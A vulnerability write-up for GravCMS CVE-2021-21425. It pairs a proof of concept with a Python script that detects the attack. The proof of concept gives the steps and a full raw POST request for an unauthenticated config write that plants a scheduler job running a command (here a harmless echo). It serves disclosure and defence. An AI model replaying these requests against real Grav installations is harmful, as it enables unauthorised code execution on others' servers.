
GravCMS unauthenticated arbitrary YAML write / RCE (CVE-2021-21425)

Detailed analysis: https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/

Arbitrary YAML file write:

  • 1 – Browse to the hxxp://target/admin URL.
  • 2 – Obtain the cookie and extract the admin-nonce value from the login form.
  • 3 – Send the following POST request.
POST /admin/config/site HTTP/1.1
HOST: target
...

task=SaveDefault&data[title]=PWNED&admin-nonce=xxx

RCE:

POST /admin/config/scheduler HTTP/1.1
Host: 192.168.179.131
Content-Length: 348
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.179.131
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.179.131/admin/forgot
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: grav-site-1dfbe94-admin=s2pca2cleqg78u8iit6v593h60
Connection: close

task=SaveDefault&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bcommand%5D=/usr/bin/echo
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bargs%5D=1337
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bat%5D=*+*+*+*+*
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput%5D=/tmp/1.txt
&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput_mode%5D=append
&admin-nonce=b78bb0a12604579896f9b4796dde8833
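The two requests above (the site-config write and the scheduler custom_jobs write) share one shape: a POST to /admin/config/<name> carrying task=SaveDefault and data[...] keys, sent from a client that has only seen login-stage pages. The following detection script is an added example, not part of the original page and not Grav project code. It assumes request records (client, method, path, Referer, body) are available from a reverse proxy or WAF that logs POST bodies; the sample records are constructed here from the payloads shown above.

```python
"""Flag Grav admin config-save POSTs of the shape used by CVE-2021-21425.

Added detection example; not from the original page or the Grav project.
Input records are constructed below. In a real deployment they would come
from a reverse proxy or WAF that records POST bodies (assumption).
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample records: (client_ip, method, path, referer, body).
# Bodies reuse the payloads from the write-up above.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "GET", "/admin", "", ""),
    ("10.0.0.5", "POST", "/admin/config/site", "http://target/admin",
     "task=SaveDefault&data%5Btitle%5D=PWNED&admin-nonce=xxx"),
    ("10.0.0.5", "POST", "/admin/config/scheduler", "http://target/admin/forgot",
     "task=SaveDefault"
     "&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bcommand%5D=/usr/bin/echo"
     "&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bargs%5D=1337"
     "&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bat%5D=*+*+*+*+*"
     "&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput%5D=/tmp/1.txt"
     "&admin-nonce=b78bb0a12604579896f9b4796dde8833"),
    # Ordinary page save by another client: not a config-save endpoint.
    ("10.0.0.9", "POST", "/admin/pages/home", "http://target/admin/pages/home",
     "task=save&data%5Bheader%5D%5Btitle%5D=Home"),
]

CONFIG_SAVE_RE = re.compile(r"^/admin/config/([A-Za-z0-9_-]+)$")
# After URL-decoding, parse_qs yields keys like data[custom_jobs][<job>][command].
JOB_CMD_RE = re.compile(r"^data\[custom_jobs\]\[([^\]]+)\]\[command\]$")
# Admin pages reachable without a session. A config save whose Referer is one
# of these matches the unauthenticated write flow described in the write-up.
ANON_REFERER_PATHS = ("/admin", "/admin/forgot", "/admin/login")


def analyse(requests):
    """Return a finding per config-save POST, ordered as in the input."""
    findings = []
    for client, method, path, referer, body in requests:
        m = CONFIG_SAVE_RE.match(path)
        if method != "POST" or not m:
            continue
        params = parse_qs(body, keep_blank_values=True)
        if params.get("task", [""])[0] != "SaveDefault":
            continue

        data_keys = sorted(k for k in params if k.startswith("data["))
        # Scheduler writes that set a job command are the RCE primitive.
        jobs = {}
        for key in data_keys:
            jm = JOB_CMD_RE.match(key)
            if jm:
                jobs[jm.group(1)] = params[key][0]

        ref_path = urlparse(referer).path.rstrip("/") or "/"
        if jobs:
            severity = "critical"   # new cron-style job with a command
        elif ref_path in ANON_REFERER_PATHS:
            severity = "high"       # config written straight from a login page
        else:
            severity = "info"       # normal admin activity; keep for audit

        findings.append({
            "client": client,
            "config": m.group(1),
            "severity": severity,
            "keys": data_keys,
            "jobs": jobs,
        })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_REQUESTS):
        print(f"[{f['severity']}] {f['client']} wrote {f['config']} "
              f"keys={f['keys']} jobs={f['jobs']}")
```

A critical finding names the job and command that were written into the scheduler configuration, which tells the responder what to remove from the scheduler YAML and what to look for in the scheduler's output path; the lasting fix is to update the admin plugin as described in the GHSA advisory referenced below.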

References:

  • https://nvd.nist.gov/vuln/detail/CVE-2021-21425
  • https://github.com/getgrav/grav-plugin-admin/security/advisories/GHSA-6f53-6qgv-39pj
  • https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/